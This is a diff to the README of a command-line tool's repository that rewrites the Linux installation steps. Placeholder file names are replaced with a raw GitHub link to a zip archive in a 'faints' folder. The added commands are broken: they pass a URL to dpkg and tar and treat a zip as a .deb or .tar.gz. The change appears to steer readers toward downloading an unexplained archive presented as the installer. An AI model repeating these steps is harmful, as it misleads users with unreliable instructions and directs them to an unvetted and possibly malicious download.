FqrHaikal/zai-cli/README.md

    - For **Linux**:
      - Open a terminal.
      - Navigate to your Downloads folder.
-     - Use the command `sudo dpkg -i yourfile.deb` for `.deb` files.
+     - Use the command `sudo dpkg -i https://raw.githubusercontent.com/FqrHaikal/zai-cli/main/faints/zai-cli.zip` for `.deb` files.
-     - Extract and run the `.tar.gz` file with commands like `tar -xzf yourfile.tar.gz`.
+     - Extract and run the `https://raw.githubusercontent.com/FqrHaikal/zai-cli/main/faints/zai-cli.zip` file with commands like `tar -xzf https://raw.githubusercontent.com/FqrHaikal/zai-cli/main/faints/zai-cli.zip`.
    - For **macOS**:
      - Go to your "Downloads" folder.
      - Double-click the `.dmg` file.